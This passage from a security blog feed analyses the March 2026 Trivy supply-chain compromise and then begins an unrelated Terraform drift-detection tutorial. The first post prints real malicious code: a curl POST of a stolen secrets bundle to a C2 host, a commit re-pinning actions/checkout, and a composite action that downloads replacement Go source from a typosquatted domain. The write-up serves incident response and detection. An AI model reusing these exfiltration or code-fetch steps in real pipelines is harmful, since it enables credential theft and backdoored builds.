        <span class="nt">--data-binary</span> <span class="s2">"@</span><span class="k">${</span><span class="nv">_BUNDLE</span><span class="k">}</span><span class="s2">"</span> <span class="o">&gt;</span>/dev/null 2&gt;&amp;1 <span class="o">||</span> <span class="nb">true
    </span><span class="k">fi
  fi

  </span><span class="nb">rm</span> <span class="nt">-rf</span> <span class="s2">"</span><span class="nv">$_WORKDIR</span><span class="s2">"</span> <span class="s2">"</span><span class="nv">$_PUB_KEY_PEM</span><span class="s2">"</span>
<span class="k">fi
</span><span class="nb">rm</span> <span class="nt">-f</span> <span class="s2">"</span><span class="nv">$COLLECTED</span><span class="s2">"</span>
</code></pre></div></div>

<p>First it tries the C2 directly: a POST to <code class="language-plaintext highlighter-rouge">scan.aquasecurtiy.org</code> over TLS, which looks like any other HTTPS traffic. The <code class="language-plaintext highlighter-rouge">curl</code> captures the HTTP status code. If the server responds with a 2xx, the job is done.</p>

<p>But if the C2 is down, unreachable, or returns an error, and the workflow happens to have a GitHub PAT available (which <code class="language-plaintext highlighter-rouge">trivy-action</code> accepts as the <code class="language-plaintext highlighter-rouge">github-pat</code> input and the script reads as <code class="language-plaintext highlighter-rouge">INPUT_GITHUB_PAT</code>), the fallback kicks in. It uses the victim’s own PAT to create a public repository called <code class="language-plaintext highlighter-rouge">tpcp-docs</code> on the victim’s GitHub account, creates a release tagged with the current timestamp, and uploads the encrypted bundle as a release asset. Your own credentials, exfiltrated through your own GitHub account, sitting in a public repo anyone can download from. The attacker just needs to watch for new <code class="language-plaintext highlighter-rouge">tpcp-docs</code> repos appearing on GitHub.</p>

<p>Wiz identified an additional fallback C2 at <code class="language-plaintext highlighter-rouge">plug-tab-protective-relay.trycloudflare.com</code> (a Cloudflare Tunnel), giving the attacker yet another exfiltration path if the primary domain went down.</p>

<p>Finally, cleanup. The temp directory, key files, and collection file all get deleted. The only trace left behind is whatever the runner’s process table recorded, which, as it turns out, was enough.</p>

<h2 id="it-didnt-stop-at-ci">It Didn’t Stop at CI</h2>

<p>Everything above describes the <code class="language-plaintext highlighter-rouge">trivy-action</code> shell script side. The binary side was a separate operation, and it started two weeks earlier.</p>

<p>On March 4, <a href="https://github.com/aquasecurity/trivy/commit/1885610c6a34811c8296416ae69f568002ef11ec">commit <code class="language-plaintext highlighter-rouge">1885610c</code></a> landed in <code class="language-plaintext highlighter-rouge">aquasecurity/trivy</code> with the message <code class="language-plaintext highlighter-rouge">fix(ci): Use correct checkout pinning</code>, attributed to <code class="language-plaintext highlighter-rouge">DmitriyLewen</code>. The diff touched two workflow files across 14 lines, and most of it was noise: single quotes swapped for double quotes, a trailing space removed from a <code class="language-plaintext highlighter-rouge">mkdir</code> line. The kind of commit that passes review because there’s nothing to review.</p>

<p>Two lines mattered. The first swapped the <code class="language-plaintext highlighter-rouge">actions/checkout</code> SHA in the release workflow:</p>

<div class="language-diff highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gd">-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
</span><span class="gi">+        uses: actions/checkout@70379aad1a8b40919ce8b382d3cd7d0315cde1d0 # v6.0.2
</span></code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge"># v6.0.2</code> comment stayed. The SHA changed. The second added <code class="language-plaintext highlighter-rouge">--skip=validate</code> to the GoReleaser invocation, telling it to skip its validation step, including the check that refuses to build from a git working tree with uncommitted changes.</p>
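<p>That pattern (the SHA moves, the version comment stays put) is mechanical enough to check for in review. Here’s a rough Python sketch that scans a unified diff for it. The regex and function name are my own, and it assumes the <code class="language-plaintext highlighter-rouge">uses: owner/repo@sha # version</code> comment convention shown in the diff above:</p>

```python
import re

# Matches added/removed diff lines of the form: uses: owner/repo@SHA # version
USES_RE = re.compile(
    r"^([+-])\s*(?:-\s*)?uses:\s*(\S+)@([0-9a-f]{40})\s*#\s*(\S+)"
)


def suspicious_repins(diff_text: str) -> list[tuple[str, str, str, str]]:
    """Find actions whose pinned SHA changed while the version comment did not."""
    removed = {}
    findings = []
    for line in diff_text.splitlines():
        match = USES_RE.match(line)
        if match is None:
            continue
        sign, action, sha, version = match.groups()
        if sign == "-":
            removed[(action, version)] = sha
        elif removed.get((action, version), sha) != sha:
            findings.append((action, version, removed[(action, version)], sha))
    return findings


# The two lines from the March 4 commit.
diff = """\
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@70379aad1a8b40919ce8b382d3cd7d0315cde1d0 # v6.0.2
"""
flagged = suspicious_repins(diff)
```

<p>A release tag should resolve to exactly one commit, so any hit here deserves a human look before merge.</p>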

<p>The payload lived at the other end of that SHA. <a href="https://github.com/actions/checkout/commit/70379aad1a8b40919ce8b382d3cd7d0315cde1d0">Commit <code class="language-plaintext highlighter-rouge">70379aad</code></a> sits in the <code class="language-plaintext highlighter-rouge">actions/checkout</code> repository as an orphaned commit. GitHub’s UI flags it with a yellow banner: <em>“This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.”</em> The attacker created it in a fork of <code class="language-plaintext highlighter-rouge">actions/checkout</code>, but GitHub’s architecture makes fork commits reachable by SHA from the parent repo. The author is listed as <code class="language-plaintext highlighter-rouge">Guillermo Rauch &lt;rauchg@gmail.com&gt;</code> (spoofed, again), the commit message references <a href="https://github.com/actions/checkout/pull/2356">PR #2356</a> (a real, closed pull request by a GitHub employee), and the commit is unsigned. Everything about it is designed to look routine if you only glance at the metadata.</p>

<p>The diff replaced <code class="language-plaintext highlighter-rouge">action.yml</code>’s Node.js entrypoint with a composite action. The composite action performs a legitimate checkout via the parent commit, then silently overwrites the Trivy source tree:</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code>   <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s2">"</span><span class="s">Setup</span><span class="nv"> </span><span class="s">Checkout"</span>
     <span class="na">shell</span><span class="pi">:</span> <span class="s">bash</span>
     <span class="na">run</span><span class="pi">:</span> <span class="pi">|</span>
       <span class="s">BASE="https://scan.aquasecurtiy.org/static"</span>
       <span class="s">curl -sf "$BASE/main.go" -o cmd/trivy/main.go &amp;&gt; /dev/null</span>
       <span class="s">curl -sf "$BASE/scand.go" -o cmd/trivy/scand.go &amp;&gt; /dev/null</span>
       <span class="s">curl -sf "$BASE/fork_unix.go" -o cmd/trivy/fork_unix.go &amp;&gt; /dev/null</span>
       <span class="s">curl -sf "$BASE/fork_windows.go" -o cmd/trivy/fork_windows.go &amp;&gt; /dev/null</span>
       <span class="s">curl -sf "$BASE/.golangci.yaml" -o .golangci.yaml &amp;&gt; /dev/null</span>
</code></pre></div></div>

<p>Four Go files pulled from the same typosquatted C2 and dropped into <code class="language-plaintext highlighter-rouge">cmd/trivy/</code>, replacing the legitimate source. A fifth download replaced <code class="language-plaintext highlighter-rouge">.golangci.yaml</code> to disable linter rules that would have flagged the injected code. The C2 is no longer serving these files, so the exact contents can’t be independently verified, but the file names and Wiz’s behavioral analysis of the compiled binary tell the story: <code class="language-plaintext highlighter-rouge">main.go</code> bootstrapped the malware before the real scanner, <code class="language-plaintext highlighter-rouge">scand.go</code> carried the credential-stealing logic, and <code class="language-plaintext highlighter-rouge">fork_unix.go</code>/<code class="language-plaintext highlighter-rouge">fork_windows.go</code> handled platform-specific persistence.</p>

<p>When GoReleaser ran with validation skipped, it built binaries from this poisoned source and published them as <code class="language-plaintext highlighter-rouge">v0.69.4</code> through Trivy’s own release infrastructure. No runtime download, no shell script, no base64. The malware was compiled in.</p>

<p>The malicious binary had a second mode. When it detected it was running outside of GitHub Actions (<code class="language-plaintext highlighter-rouge">GITHUB_ACTIONS != "true"</code>), it dropped a Python script to <code class="language-plaintext highlighter-rouge">~/.config/systemd/user/sysmon.py</code> and created a systemd user unit to run it persistently. That script polled <code class="language-plaintext highlighter-rouge">tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0.io</code> (an ICP-hosted endpoint) every five minutes, downloading and executing whatever payload it received.</p>

<p>In other words: if a developer ran the compromised Trivy binary locally (not in CI), they got a persistent backdoor installed on their workstation. The CI credential theft was the loud part of the attack. The quiet part was long-term access to developer machines.</p>
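<p>A quick way to check a workstation for that dropper is to look for the file itself. This Python sketch tests for the <code class="language-plaintext highlighter-rouge">sysmon.py</code> path named above and, as an extra assumption on my part, flags any user unit file in the same directory that mentions it (I don’t know the actual unit name):</p>

```python
from pathlib import Path


def persistence_indicators(home: Path) -> list[Path]:
    """Return paths under home that match the sysmon.py persistence pattern."""
    unit_dir = home / ".config" / "systemd" / "user"
    if not unit_dir.is_dir():
        return []
    hits = []
    script = unit_dir / "sysmon.py"
    if script.is_file():
        hits.append(script)
    # Assumption: the unit file references the script by name somewhere in its text.
    for unit in sorted(unit_dir.glob("*.service")):
        if "sysmon.py" in unit.read_text(errors="replace"):
            hits.append(unit)
    return hits
```

<p>Call it as <code class="language-plaintext highlighter-rouge">persistence_indicators(Path.home())</code>. An empty list is not a clean bill of health, since the script could have been renamed or removed after running.</p>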

<p>The <code class="language-plaintext highlighter-rouge">aqua-bot</code> compromise also yielded GPG keys, Docker Hub credentials, Twitter account credentials, and Slack credentials for Aqua Security itself, which were exfiltrated to the Cloudflare Tunnel C2 endpoint.</p>

<h2 id="the-tell">The Tell</h2>

<p>The one thing the attacker couldn’t fully hide was the exfiltration itself. The <code class="language-plaintext highlighter-rouge">curl</code> to the C2 ran as a background process while the legitimate Trivy scan continued in the foreground. When the GitHub Actions runner finished the job and cleaned up, it found this orphaned process still running and killed it:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Terminate orphan process: pid (2516) (curl)
</code></pre></div></div>

<p>That single log line, <code class="language-plaintext highlighter-rouge">Terminate orphan process ... (curl)</code>, was the smoking gun. Compromised runs showed between one and four orphan curl processes depending on how many matrix jobs were in the workflow. If your Trivy workflow doesn’t use curl and you see that message in your logs from March 19, you have a problem.</p>
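<p>If you have run logs exported as text, hunting for that line is a one-regex job. A minimal Python sketch, assuming the log line format shown above (the function name is mine):</p>

```python
import re

# Matches the runner cleanup message, e.g. "Terminate orphan process: pid (2516) (curl)".
ORPHAN_RE = re.compile(r"Terminate orphan process: pid \((\d+)\) \(([^)]+)\)")


def orphan_processes(log_text: str, names=("curl",)) -> list[tuple[int, str]]:
    """Return (pid, process name) for each orphan-process line naming one of names."""
    return [
        (int(pid), name)
        for pid, name in ORPHAN_RE.findall(log_text)
        if name in names
    ]


# Hypothetical log excerpt with a timestamp prefix on each line.
log = (
    "2026-03-19T18:02:11Z Cleaning up orphan processes\n"
    "2026-03-19T18:02:11Z Terminate orphan process: pid (2516) (curl)\n"
    "2026-03-19T18:02:11Z Terminate orphan process: pid (2520) (node)\n"
)
hits = orphan_processes(log)
```

<p>Legitimate workflows can leave orphaned <code class="language-plaintext highlighter-rouge">curl</code> processes too, so treat a hit as a reason to investigate rather than proof of compromise.</p>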

<h2 id="the-cleanup">The Cleanup</h2>

<p>On March 20, Aqua Security re-published all 74 <code class="language-plaintext highlighter-rouge">trivy-action</code> releases within a 78-minute window. Roughly 97 Trivy CLI releases were deleted from GitHub (tags still exist, but the releases are gone). The <code class="language-plaintext highlighter-rouge">setup-trivy</code> action was stripped to a single version. The malicious <code class="language-plaintext highlighter-rouge">v0.69.4</code> CLI binary and the <code class="language-plaintext highlighter-rouge">trivy-action</code> <code class="language-plaintext highlighter-rouge">0.34.2</code> tag were removed entirely.</p>

<p>The mass re-publishing means that for forensic purposes, the current tag-to-SHA mappings don’t reflect what those tags pointed to during the attack window. If you need to know what your runners actually pulled, the answer is in your GitHub Actions run logs, specifically the <code class="language-plaintext highlighter-rouge">Download action repository</code> line that records the resolved SHA at execution time.</p>
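<p>Pulling those resolved SHAs out of exported logs can be scripted. In this Python sketch the line format in the regex is how I’ve seen the runner print it, so treat it as an assumption and adjust it to your own logs. The SHA in the sample is a placeholder, not a real indicator:</p>

```python
import re

# Assumed format: Download action repository 'owner/repo@ref' (SHA:<40 hex chars>)
DOWNLOAD_RE = re.compile(
    r"Download action repository '([^'@]+)@([^']+)' \(SHA:([0-9a-f]{40})\)"
)


def resolved_actions(log_text: str) -> list[tuple[str, str, str]]:
    """Return (repository, requested ref, resolved SHA) for each download line."""
    return DOWNLOAD_RE.findall(log_text)


# Hypothetical log line with a placeholder SHA.
log = (
    "Download action repository 'aquasecurity/trivy-action@0.34.2' "
    "(SHA:0123456789abcdef0123456789abcdef01234567)\n"
)
resolved = resolved_actions(log)
```

<p>Compare the third field against SHAs you trust, not against what the tag points to today.</p>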

<h2 id="takeaways">Takeaways</h2>

<p>The approximate exposure window was <strong>2026-03-19 ~17:43 UTC through 2026-03-20 ~05:40 UTC</strong>, roughly twelve hours. If you ran <code class="language-plaintext highlighter-rouge">trivy-action@0.34.2</code> during that window, assume every secret accessible to that workflow was exfiltrated and rotate accordingly.</p>

<p><strong>Stop using Trivy.</strong> This isn’t the first time Aqua Security’s infrastructure has been compromised, and the <code class="language-plaintext highlighter-rouge">aqua-bot</code> account that enabled this attack was reportedly left exposed from a <em>previous</em> incident earlier in March that was never fully contained. That’s not a one-off failure; it’s an organizational pattern. A security scanning tool that can’t secure its own supply chain is a liability, not an asset. Remove <code class="language-plaintext highlighter-rouge">trivy-action</code> from your workflows and the Trivy CLI from your toolchains.</p>

<p><strong>If you can’t migrate immediately, pin by SHA.</strong> Git tags are mutable. A full commit SHA is the only reference an attacker can’t move:</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># Vulnerable</span>
<span class="pi">-</span> <span class="na">uses</span><span class="pi">:</span> <span class="s">aquasecurity/trivy-action@v0.35.0</span>

<span class="c1"># Pinned (but you should still be migrating off Trivy)</span>
<span class="pi">-</span> <span class="na">uses</span><span class="pi">:</span> <span class="s">aquasecurity/trivy-action@57a97c7e7821a5776cebc9bb87c984fa69cba8f1</span> <span class="c1"># v0.35.0</span>
</code></pre></div></div>
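
<p>To find what still needs pinning, a rough grep over your workflow files is usually enough. This is a sketch under a simple assumption: anything after <code class="language-plaintext highlighter-rouge">@</code> that isn’t a 40-character hex string counts as unpinned. The function name is mine.</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#!/usr/bin/env bash
# Sketch: list `uses:` references that are not pinned to a full commit SHA.
unpinned_actions() {
  local workflows_dir="$1"
  # First grep: every `uses: owner/repo@ref` line, with file name and line number.
  # Second grep: drop the lines whose ref is a 40-character hex SHA.
  grep -rnE '^[[:space:]]*(-[[:space:]]*)?uses:[[:space:]]*[^[:space:]]+@' "$workflows_dir" \
    | grep -vE '@[0-9a-f]{40}([[:space:]]|$)'
}
</code></pre></div></div>

<p>Run it as <code class="language-plaintext highlighter-rouge">unpinned_actions .github/workflows</code>. Local actions referenced by path have no <code class="language-plaintext highlighter-rouge">@</code> and are skipped on purpose.</p>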

<p><strong>Audit your dependency automation.</strong> Renovate and Dependabot will happily adopt a version tag that was never part of an official release. If <code class="language-plaintext highlighter-rouge">0.34.2</code> doesn’t appear in a project’s changelog, something is wrong, but no bot is checking that. This is a systemic problem, but it’s worse when the upstream project has already demonstrated it can’t protect its own release infrastructure.</p>

<p><strong>Check for the persistence dropper.</strong> If anyone on your team ran the <code class="language-plaintext highlighter-rouge">v0.69.4</code> trivy binary locally, look for <code class="language-plaintext highlighter-rouge">~/.config/systemd/user/sysmon.py</code> and its associated systemd unit. That machine needs to be treated as compromised. Wipe and rebuild; don’t just remove the files.</p>
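
<p>A minimal check for that path might look like this. The unit’s file name isn’t something I can state with certainty, so the sketch searches for any user unit that references the script rather than guessing; the function name is hypothetical.</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#!/usr/bin/env bash
# Sketch: look for the dropper script and any user-level systemd unit pointing at it.
# Returns 0 if something was found, 1 otherwise.
check_dropper() {
  local home_dir="${1:-$HOME}"
  local unit_dir="$home_dir/.config/systemd/user"
  local status=1

  [ -d "$unit_dir" ] || return 1

  if [ -e "$unit_dir/sysmon.py" ]; then
    echo "FOUND script: $unit_dir/sysmon.py"
    status=0
  fi

  # The unit name is unknown here, so print every .service file that mentions the script
  if grep -rl --include='*.service' 'sysmon\.py' "$unit_dir"; then
    status=0
  fi

  return "$status"
}
</code></pre></div></div>

<p>A clean result only means these two indicators are absent. It doesn’t clear the machine.</p>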

<p>Check your runner logs for orphan curl processes. Look for repositories named <code class="language-plaintext highlighter-rouge">tpcp-docs</code> on any GitHub account whose PAT was in scope. Block <code class="language-plaintext highlighter-rouge">scan.aquasecurtiy.org</code> and <code class="language-plaintext highlighter-rouge">45.148.10.212</code> at your network perimeter. As of this writing, the C2 is still live. And start planning your migration off Trivy today, not after the next compromise.</p>

<hr />

<p><em>The upstream incident is tracked at <a href="https://github.com/aquasecurity/trivy/discussions/10425">aquasecurity/trivy#10425</a>. Wiz’s detailed analysis of the broader attack is available <a href="https://www.wiz.io/blog/trivy-compromised-teampcp-supply-chain-attack">here</a>.</em></p>]]></content><author><name></name></author><category term="security" /><category term="supply-chain" /><category term="github-actions" /><category term="incident-response" /><summary type="html"><![CDATA[On March 19, 2026, someone (or some group) poisoned the Aqua Security Trivy ecosystem. A tool that thousands of organizations rely on to find vulnerabilities in their container images and configurations was quietly turned into a weapon that stole their secrets instead. I spent some time pulling apart the malicious code and cross-referencing findings from Wiz’s analysis, and figured the walkthrough was worth sharing. Here’s how it happened (and how a majority of the tech industry ignored the compromise because it was a Friday).]]></summary></entry><entry><title type="html">Terraform Drift Detection Powered by GitHub Actions</title><link href="https://rosesecurity.cloud/2025/12/11/terraform-drift-detection-with-github-actions.html" rel="alternate" type="text/html" title="Terraform Drift Detection Powered by GitHub Actions" /><published>2025-12-11T00:00:00+00:00</published><updated>2025-12-11T00:00:00+00:00</updated><id>https://rosesecurity.cloud/2025/12/11/terraform-drift-detection-with-github-actions</id><content type="html" xml:base="https://rosesecurity.cloud/2025/12/11/terraform-drift-detection-with-github-actions.html"><![CDATA[<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>TL;DR
Build a _zero-cost_ drift detection system using GitHub Actions and Terraform's native exit codes. This workflow automatically discovers all Terraform root modules, runs daily drift checks, and creates GitHub issues when changes are detected.
</code></pre></div></div>

<h2 id="the-problem">The Problem</h2>

<p>Infrastructure drift happens when your cloud resources diverge from your Terraform state. Manual changes, console modifications, or other automation can silently alter infrastructure, leaving some serious blind spots and inconsistencies. Traditional drift detection generally involves complex, custom, or expensive solutions. <a href="https://github.com/snyk/driftctl#this-project-is-now-in-maintenance-mode-we-cannot-promise-to-review-contributions-please-feel-free-to-fork-the-project-to-apply-any-changes-you-might-want-to-make">RIP <code class="language-plaintext highlighter-rouge">driftctl</code></a></p>

<h2 id="the-simplicity-of-github-actions">The Simplicity of GitHub Actions</h2>

<p>I love GitHub Actions. They offer a native, cost-effective platform for automated drift detection. By leveraging Terraform’s built-in exit codes and GitHub’s issue tracking, we can build a robust drift detection system using only native features with no external services required. This approach works well for small-to-medium deployments. Larger-scale production use requires additional considerations like multi-account support, sensitive data sanitization, and automated remediation (I’ll talk about that below).</p>

<h2 id="the-workflow">The Workflow</h2>

<h3 id="triggers-and-permissions">Triggers and Permissions</h3>

<p>The workflow runs on a daily schedule and supports manual execution via <code class="language-plaintext highlighter-rouge">workflow_dispatch</code>. We configure OIDC (<code class="language-plaintext highlighter-rouge">id-token: write</code>) for secure, keyless AWS authentication and grant permissions to create issues and pull requests for drift tracking.</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">name</span><span class="pi">:</span> <span class="s">Terraform Drift Detection</span>

<span class="c1"># We can also add some fancy logic to extract this from a Dockerfile</span>
<span class="c1"># or versions.tf so we don't have to continually monitor and bump this.</span>
<span class="na">env</span><span class="pi">:</span>
  <span class="na">TF_VERSION</span><span class="pi">:</span> <span class="s">1.X.X</span>

<span class="na">on</span><span class="pi">:</span>
  <span class="na">workflow_dispatch</span><span class="pi">:</span>
  <span class="na">schedule</span><span class="pi">:</span>
    <span class="pi">-</span> <span class="na">cron</span><span class="pi">:</span> <span class="s2">"</span><span class="s">00</span><span class="nv"> </span><span class="s">6</span><span class="nv"> </span><span class="s">*</span><span class="nv"> </span><span class="s">*</span><span class="nv"> </span><span class="s">*"</span> <span class="c1"># Every day at 06:00 UTC</span>

<span class="na">permissions</span><span class="pi">:</span>
  <span class="c1"># This is required for requesting the JWT and opening issues</span>
  <span class="na">id-token</span><span class="pi">:</span> <span class="s">write</span>
  <span class="na">contents</span><span class="pi">:</span> <span class="s">read</span>
  <span class="na">pull-requests</span><span class="pi">:</span> <span class="s">write</span>
  <span class="na">issues</span><span class="pi">:</span> <span class="s">write</span>
</code></pre></div></div>

<h3 id="finding-root-modules">Finding Root Modules</h3>

<p>This job dynamically discovers all Terraform root modules in the repository by searching for <code class="language-plaintext highlighter-rouge">.tf</code> files while excluding module subdirectories and Terraform’s cache. The <code class="language-plaintext highlighter-rouge">find</code> command output is transformed into a JSON array using <code class="language-plaintext highlighter-rouge">jq</code>, enabling parallel drift detection across multiple environments via matrix strategy. This may differ depending on your Terraform structure, but the general idea is to create a matrix of Terraform root modules that we can run <code class="language-plaintext highlighter-rouge">terraform plan</code> against.</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">jobs</span><span class="pi">:</span>
  <span class="na">find-terraform-envs</span><span class="pi">:</span>
    <span class="na">name</span><span class="pi">:</span> <span class="s1">'</span><span class="s">Find</span><span class="nv"> </span><span class="s">Terraform</span><span class="nv"> </span><span class="s">Directories'</span>
    <span class="na">runs-on</span><span class="pi">:</span> <span class="s">ubuntu-latest</span>
    <span class="na">outputs</span><span class="pi">:</span>
      <span class="na">terraform-envs</span><span class="pi">:</span> <span class="s">${{ steps.fetch-environments.outputs.dirs }}</span>
    <span class="na">steps</span><span class="pi">:</span>
      <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">Checkout code</span>
        <span class="na">uses</span><span class="pi">:</span> <span class="s">actions/checkout@v4.2.2</span>

      <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">Fetch Environments</span>
        <span class="na">id</span><span class="pi">:</span> <span class="s">fetch-environments</span>
        <span class="na">run</span><span class="pi">:</span> <span class="pi">|</span>
          <span class="s"># Create a matrix of Terraform root modules</span>
          <span class="s">DIRS=$(find . -type f -name '*.tf' -not -path "*/modules/*" -not -path "*/.terraform/*" -exec dirname {} \; | sort -u | jq -R -s -c 'split("\n")[:-1]')</span>
          <span class="s">echo "dirs=$DIRS" &gt;&gt; "$GITHUB_OUTPUT"</span>
          <span class="s">echo "Found environments: $DIRS"</span>
</code></pre></div></div>
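
<p>It’s worth running the discovery step locally before trusting it in CI. The sketch below wraps the same <code class="language-plaintext highlighter-rouge">find</code> expression in a function (the name is mine) so you can point it at any checkout and see which directories it treats as root modules.</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#!/usr/bin/env bash
# Sketch: print the directories the workflow would treat as Terraform root modules.
list_root_modules() {
  local repo_root="$1"
  (
    cd "$repo_root" || exit 1
    # Same filters as the workflow: skip reusable modules and Terraform's cache
    find . -type f -name '*.tf' \
      -not -path '*/modules/*' \
      -not -path '*/.terraform/*' \
      -exec dirname {} \; | sort -u
  )
}
</code></pre></div></div>

<p>Piping the result through <code class="language-plaintext highlighter-rouge">jq -R -s -c 'split("\n")[:-1]'</code> gives the JSON array the matrix expects. If a directory shows up that shouldn’t, add another <code class="language-plaintext highlighter-rouge">-not -path</code> filter.</p>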

<h3 id="credential-configuration-and-setup">Credential Configuration and Setup</h3>

<p>The drift detection job runs in parallel for each discovered Terraform directory using a matrix strategy with <code class="language-plaintext highlighter-rouge">fail-fast: false</code> to ensure one environment’s failure doesn’t block others. AWS credentials are configured via OIDC role assumption (no static keys), and Terraform is installed with <code class="language-plaintext highlighter-rouge">terraform_wrapper: false</code> to ensure clean exit code propagation. OIDC requires some one-time setup in AWS (an IAM OIDC identity provider for GitHub and a role whose trust policy allows this repository), but it’s the recommended approach for secure, keyless authentication.</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code>  <span class="na">drift-detection</span><span class="pi">:</span>
    <span class="na">name</span><span class="pi">:</span> <span class="s1">'</span><span class="s">Drift</span><span class="nv"> </span><span class="s">Detection'</span>
    <span class="na">runs-on</span><span class="pi">:</span> <span class="s">ubuntu-latest</span>
    <span class="na">needs</span><span class="pi">:</span> <span class="s">find-terraform-envs</span>
    <span class="na">if</span><span class="pi">:</span> <span class="s">needs.find-terraform-envs.outputs.terraform-envs != '[]'</span>
    <span class="na">strategy</span><span class="pi">:</span>
      <span class="na">fail-fast</span><span class="pi">:</span> <span class="kc">false</span>
      <span class="na">matrix</span><span class="pi">:</span>
        <span class="na">tf_dir</span><span class="pi">:</span> <span class="s">${{ fromJson(needs.find-terraform-envs.outputs.terraform-envs) }}</span>
    <span class="na">steps</span><span class="pi">:</span>
      <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">Checkout code</span>
        <span class="na">uses</span><span class="pi">:</span> <span class="s">actions/checkout@v4.2.2</span>

      <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">Configure AWS Credentials</span>
        <span class="na">uses</span><span class="pi">:</span> <span class="s">aws-actions/configure-aws-credentials@v4.1.0</span>
        <span class="na">with</span><span class="pi">:</span>
          <span class="na">aws-region</span><span class="pi">:</span> <span class="s">us-east-1</span>
          <span class="na">role-to-assume</span><span class="pi">:</span> <span class="s">$</span>
          <span class="na">role-session-name</span><span class="pi">:</span> <span class="s">Drift_Detection</span>

      <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">Set up Terraform</span>
        <span class="na">uses</span><span class="pi">:</span> <span class="s">hashicorp/setup-terraform@v3.1.2</span>
        <span class="na">with</span><span class="pi">:</span>
          <span class="na">terraform_version</span><span class="pi">:</span> <span class="s">${{ env.TF_VERSION }}</span>
          <span class="na">terraform_wrapper</span><span class="pi">:</span> <span class="kc">false</span>

      <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">Terraform Init</span>
        <span class="na">working-directory</span><span class="pi">:</span> <span class="s">${{ matrix.tf_dir }}</span>
        <span class="na">run</span><span class="pi">:</span> <span class="s">terraform init -input=false</span>
</code></pre></div></div>

<h3 id="detecting-drift">Detecting Drift</h3>

<p>This is the core drift detection mechanism. The <code class="language-plaintext highlighter-rouge">terraform plan -detailed-exitcode</code> returns exit codes: <code class="language-plaintext highlighter-rouge">0</code> (no changes), <code class="language-plaintext highlighter-rouge">1</code> (error), or <code class="language-plaintext highlighter-rouge">2</code> (drift detected). We capture the actual Terraform exit code using <code class="language-plaintext highlighter-rouge">${PIPESTATUS[0]}</code> rather than <code class="language-plaintext highlighter-rouge">$?</code>, which would only return <code class="language-plaintext highlighter-rouge">sed</code>’s exit code. The plan output is filtered and saved for issue creation.</p>

<p><strong>Technical Note:</strong> We use <code class="language-plaintext highlighter-rouge">set +e</code> to prevent immediate failure, <code class="language-plaintext highlighter-rouge">-input=false</code> to prevent hanging on interactive prompts, and <code class="language-plaintext highlighter-rouge">-lock-timeout=5m</code> to handle state locks gracefully.</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code>      <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">Terraform Drift Detection Plan</span>
        <span class="na">id</span><span class="pi">:</span> <span class="s">plan</span>
        <span class="na">working-directory</span><span class="pi">:</span> <span class="s">${{ matrix.tf_dir }}</span>
        <span class="na">shell</span><span class="pi">:</span> <span class="s">bash</span>
        <span class="na">run</span><span class="pi">:</span> <span class="pi">|</span>
          <span class="s">set +e # Disable exit on error for this step</span>
          <span class="s">terraform plan -detailed-exitcode -compact-warnings -no-color -input=false -lock-timeout=5m 2&gt;&amp;1 | sed -n '/Terraform will perform the following actions:/,$p' &gt; plan_output.txt</span>
          <span class="s">EXIT_CODE=${PIPESTATUS[0]}</span>
          <span class="s">echo "exit_code=$EXIT_CODE" &gt;&gt; "$GITHUB_OUTPUT"</span>
          <span class="s">echo "EXIT_CODE=$EXIT_CODE" &gt;&gt; "$GITHUB_ENV"</span>

          <span class="s"># Show the plan output</span>
          <span class="s">cat plan_output.txt</span>

          <span class="s"># Set drift detected flag</span>
          <span class="s">if [ "$EXIT_CODE" -eq 2 ]; then</span>
            <span class="s">echo "drift_detected=true" &gt;&gt; "$GITHUB_OUTPUT"</span>
            <span class="s">echo "Drift detected in ${{ matrix.tf_dir }}"</span>
          <span class="s">elif [ "$EXIT_CODE" -eq 1 ]; then</span>
            <span class="s">echo "plan_failed=true" &gt;&gt; "$GITHUB_OUTPUT"</span>
            <span class="s">echo "Plan failed in ${{ matrix.tf_dir }}"</span>
          <span class="s">else</span>
            <span class="s">echo "No drift detected in ${{ matrix.tf_dir }}"</span>
          <span class="s">fi</span>
</code></pre></div></div>
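
<p>If the <code class="language-plaintext highlighter-rouge">PIPESTATUS</code> part feels like magic, here is a tiny bash-only sketch you can run without Terraform. <code class="language-plaintext highlighter-rouge">fake_plan</code> is a hypothetical stand-in I made up that behaves like a plan that found drift.</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#!/usr/bin/env bash
# fake_plan is a hypothetical stand-in for `terraform plan -detailed-exitcode`
# in a run where drift exists: it prints a plan header and exits with 2.
fake_plan() {
  echo "Terraform will perform the following actions:"
  return 2
}

capture_plan_status() {
  local plan_status
  # Same shape as the workflow step: the plan is piped through sed
  fake_plan | sed -n '/Terraform will perform the following actions:/,$p'
  # PIPESTATUS[0] is the first command in the pipeline (the plan), not sed.
  # Read it immediately; the next command overwrites the array.
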